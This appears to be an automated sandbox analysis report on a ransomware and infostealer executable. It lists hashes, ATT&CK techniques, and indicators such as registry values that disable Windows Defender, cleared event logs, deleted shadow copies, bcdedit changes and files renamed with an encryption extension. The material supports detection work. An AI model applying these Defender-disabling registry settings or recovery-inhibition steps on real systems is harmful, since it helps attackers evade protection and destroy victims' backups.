1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3

General

Target

a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
Size

2.1MB
MD5

a0b0432294ebbc84d306993e2e7ea91c
SHA1

217f15f8048cb52b529bcad20c687422c9a29add
SHA256

1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3
SHA512

1dc1884893156b400f5c9aa0c7a922ca6a06758771f70a560c82f2b3078ae2fde9b21b797236e4d7dcd3db866d3afee18b6acee3124224c5b0aca8376afced61
SSDEEP

49152:0Whc2Iyefi4Cvv5mGb9dPaBq9MuAp3JwMLerDclJyA:9Qq6gz95Ap3JBeAJyA

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

4548 wevtutil.exe
2372 wevtutil.exe
4492 wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3360 bcdedit.exe
4956 bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

pid	process
4548	wevtutil.exe
2372	wevtutil.exe
4492	wevtutil.exe

pid	process
3360	bcdedit.exe
4956	bcdedit.exe

Drops file in Program Files directory 64 IoCs

Processes:

a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2140f8bb.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-64_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\freebxml.md.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_gzdHA4Zd52U0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\no_camera_dialog_image01.jpg	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\typing\bubble\light.gif	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.ELM.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_AJ0Jjx0z1Fo0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-200_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_444IVGCaesM0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-125_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_C8C-3gUlOa80.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\CoreEngine\Data\BrushProfile\BrushBump64.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_0DO4HmiJitU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_NJ6hzlu-Jqo0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-100.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_PF0aaOn40vA0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_qszqNfiC-H00.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_NinjaCat.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-48_altform-unplated_contrast-black_devicefamily-colorfulunplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.scale-125.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSquare310x310Logo.scale-100_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxManifest.xml	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageLargeTile.scale-100_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription2-ppd.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_hZRknW8pYPU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_Tz5JaVqAKgM0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_altform-unplated_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-unplated_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_OWYQIwsG4Pw0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_-wKLmC67B4s0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_RqWFNaSxxu40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreBadgeLogo.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.png.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_4e26_dZXfiw0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-16_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\da-DK\View3d\3DViewerProductDescription-universal.xml	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-100_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\wiggle350.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\dismiss.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_gxymKTfX3L00.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarSmallTile.scale-400.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_WHg_zerIVd40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_pK1QSayH9xA0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_SNnT2jWsyIE0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ClippingTool.targetsize-64.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\Assets\DeviceNotFound.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_mWVi0cJE2UY0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_YAn99QdBQO40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_BiX2ennT_FDqE7_VNX6T9i8OuU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-125_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\resources.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\HelpAndFeedback\FeedbackThumbnail.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3528 sc.exe
4992 sc.exe
4200 sc.exe
3108 sc.exe
4316 sc.exe
2900 sc.exe
1496 sc.exe
2376 sc.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2280 vssadmin.exe
Runs net.exe

pid	process
3528	sc.exe
4992	sc.exe
4200	sc.exe
3108	sc.exe
4316	sc.exe
2900	sc.exe
1496	sc.exe
2376	sc.exe

pid	process
2280	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exea0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

pid	process
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	4548	wevtutil.exe
Token: SeBackupPrivilege	4548	wevtutil.exe
Token: SeSecurityPrivilege	2372	wevtutil.exe
Token: SeBackupPrivilege	2372	wevtutil.exe
Token: SeSecurityPrivilege	4492	wevtutil.exe
Token: SeBackupPrivilege	4492	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	60	wmic.exe
Token: SeSecurityPrivilege	60	wmic.exe
Token: SeTakeOwnershipPrivilege	60	wmic.exe
Token: SeLoadDriverPrivilege	60	wmic.exe
Token: SeSystemProfilePrivilege	60	wmic.exe
Token: SeSystemtimePrivilege	60	wmic.exe
Token: SeProfSingleProcessPrivilege	60	wmic.exe
Token: SeIncBasePriorityPrivilege	60	wmic.exe
Token: SeCreatePagefilePrivilege	60	wmic.exe
Token: SeBackupPrivilege	60	wmic.exe
Token: SeRestorePrivilege	60	wmic.exe
Token: SeShutdownPrivilege	60	wmic.exe
Token: SeDebugPrivilege	60	wmic.exe
Token: SeSystemEnvironmentPrivilege	60	wmic.exe
Token: SeRemoteShutdownPrivilege	60	wmic.exe
Token: SeUndockPrivilege	60	wmic.exe
Token: SeManageVolumePrivilege	60	wmic.exe
Token: 33	60	wmic.exe
Token: 34	60	wmic.exe
Token: 35	60	wmic.exe
Token: 36	60	wmic.exe
Token: SeIncreaseQuotaPrivilege	4588	wmic.exe
Token: SeSecurityPrivilege	4588	wmic.exe
Token: SeTakeOwnershipPrivilege	4588	wmic.exe
Token: SeLoadDriverPrivilege	4588	wmic.exe
Token: SeSystemProfilePrivilege	4588	wmic.exe
Token: SeSystemtimePrivilege	4588	wmic.exe
Token: SeProfSingleProcessPrivilege	4588	wmic.exe
Token: SeIncBasePriorityPrivilege	4588	wmic.exe
Token: SeCreatePagefilePrivilege	4588	wmic.exe
Token: SeBackupPrivilege	4588	wmic.exe
Token: SeRestorePrivilege	4588	wmic.exe
Token: SeShutdownPrivilege	4588	wmic.exe
Token: SeDebugPrivilege	4588	wmic.exe
Token: SeSystemEnvironmentPrivilege	4588	wmic.exe
Token: SeRemoteShutdownPrivilege	4588	wmic.exe
Token: SeUndockPrivilege	4588	wmic.exe
Token: SeManageVolumePrivilege	4588	wmic.exe
Token: 33	4588	wmic.exe
Token: 34	4588	wmic.exe
Token: 35	4588	wmic.exe
Token: 36	4588	wmic.exe
Token: SeIncreaseQuotaPrivilege	4588	wmic.exe
Token: SeSecurityPrivilege	4588	wmic.exe
Token: SeTakeOwnershipPrivilege	4588	wmic.exe
Token: SeLoadDriverPrivilege	4588	wmic.exe
Token: SeSystemProfilePrivilege	4588	wmic.exe
Token: SeSystemtimePrivilege	4588	wmic.exe
Token: SeProfSingleProcessPrivilege	4588	wmic.exe
Token: SeIncBasePriorityPrivilege	4588	wmic.exe
Token: SeCreatePagefilePrivilege	4588	wmic.exe
Token: SeBackupPrivilege	4588	wmic.exe
Token: SeRestorePrivilege	4588	wmic.exe
Token: SeShutdownPrivilege	4588	wmic.exe
Token: SeDebugPrivilege	4588	wmic.exe
Token: SeSystemEnvironmentPrivilege	4588	wmic.exe
Token: SeRemoteShutdownPrivilege	4588	wmic.exe
Token: SeUndockPrivilege	4588	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3912 wrote to memory of 1060	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 1060	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 1060 wrote to memory of 2672	1060	net.exe	net1.exe
PID 1060 wrote to memory of 2672	1060	net.exe	net1.exe
PID 3912 wrote to memory of 2008	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 2008	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 2008 wrote to memory of 3168	2008	net.exe	net1.exe
PID 2008 wrote to memory of 3168	2008	net.exe	net1.exe
PID 3912 wrote to memory of 3592	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 3592	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3592 wrote to memory of 4664	3592	net.exe	net1.exe
PID 3592 wrote to memory of 4664	3592	net.exe	net1.exe
PID 3912 wrote to memory of 5044	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 5044	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 5044 wrote to memory of 1468	5044	net.exe	net1.exe
PID 5044 wrote to memory of 1468	5044	net.exe	net1.exe
PID 3912 wrote to memory of 1368	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 1368	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 1368 wrote to memory of 2960	1368	net.exe	net1.exe
PID 1368 wrote to memory of 2960	1368	net.exe	net1.exe
PID 3912 wrote to memory of 4488	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 4488	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 4488 wrote to memory of 1940	4488	net.exe	net1.exe
PID 4488 wrote to memory of 1940	4488	net.exe	net1.exe
PID 3912 wrote to memory of 3464	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 3464	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3464 wrote to memory of 8	3464	net.exe	net1.exe
PID 3464 wrote to memory of 8	3464	net.exe	net1.exe
PID 3912 wrote to memory of 3604	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3912 wrote to memory of 3604	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	net.exe
PID 3604 wrote to memory of 2368	3604	net.exe	net1.exe
PID 3604 wrote to memory of 2368	3604	net.exe	net1.exe
PID 3912 wrote to memory of 3528	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 3528	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4992	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4992	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4200	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4200	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 3108	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 3108	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4316	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 4316	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
PID 3912 wrote to memory of 2900	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	sc.exe
